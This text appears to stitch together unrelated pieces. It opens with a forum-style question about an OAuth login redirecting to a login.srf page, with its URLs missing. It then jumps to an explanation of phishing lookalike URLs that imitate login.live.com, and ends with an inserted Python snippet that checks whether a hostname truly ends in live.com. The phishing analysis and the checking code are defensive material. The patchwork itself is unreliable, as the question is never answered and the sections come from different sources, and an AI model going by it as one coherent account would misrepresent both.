After I have done the login, instead of showing the consent page and redirecting the URL back to my web: , it forwards the URL to , which I have no idea what it is. That login.srf link shows this page:
The file "login.srf" is commonly used by secure websites. It processes the user's username and password, sends a cookie identifying the user back to the browser, and redirects the user to the secure page.
As with the vast majority of phishing messages, clicking on the link in the email loads a different URL from the one written out in the message. In this case it leads us to:
-939001820183093.8982190oieenue.default.aspx.id-1033.[domain removed].com/gin.live.com.login.srf.wsignin.act-939001820183093.8982190oieenue.default.aspx.id-1033/login.srf.htm
At a quick glance they look very similar. Both contain the phrases login.live.com, login.srf, wsignin and aspx along with seemingly random strings of numbers. The thing to notice is that the official login page is on the login subdomain of live.com whereas the URL that the email pointed to features many subdomains, meaning that the actual domain that the page is hosted on is hidden in the middle of the address.
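The comparison described above can be done mechanically by checking only the right-hand end of the hostname. The following is an added example, not code from the original page; the sample URLs are constructed, and `phish.example` is a placeholder standing in for the removed domain.

```python
from urllib.parse import urlsplit

TRUSTED_DOMAIN = "live.com"  # parent domain of the official login host named above

# Constructed sample inputs. "phish.example" is a placeholder standing in for
# the "[domain removed]" part of the address; the digits are made up.
OFFICIAL = "https://login.live.com/login.srf"
LOOKALIKE = ("login.live.com.login.srf.wsignin.act-0000.default.aspx."
             "id-1033.phish.example/login.live.com.login.srf/login.srf.htm")


def hostname_of(url: str) -> str:
    """Return the lower-cased host part of a URL, with or without a scheme."""
    if "://" not in url:
        url = "//" + url  # urlsplit only finds the host after "//"
    return (urlsplit(url).hostname or "").rstrip(".")


def naive_looks_official(url: str) -> bool:
    """Flawed check, equivalent to a quick glance: keywords anywhere in the URL."""
    return all(word in url for word in ("login.live.com", "login.srf"))


def is_on_trusted_domain(url: str, trusted: str = TRUSTED_DOMAIN) -> bool:
    """True only when the host is the trusted domain or a subdomain of it."""
    host = hostname_of(url)
    return host == trusted or host.endswith("." + trusted)


def rightmost_labels(url: str, n: int = 2) -> str:
    """Last n DNS labels of the host, where the hosting domain really sits.
    Assumption: a single-label suffix such as .com; suffixes like .co.uk
    need the Public Suffix List."""
    return ".".join(hostname_of(url).split(".")[-n:])


if __name__ == "__main__":
    for url in (OFFICIAL, LOOKALIKE):
        print(f"{rightmost_labels(url):15} naive={naive_looks_official(url)!s:5} "
              f"trusted={is_on_trusted_domain(url)}  {url[:50]}")
```

The keyword check accepts both addresses, while the suffix check accepts only the one whose hostname actually ends in `live.com`.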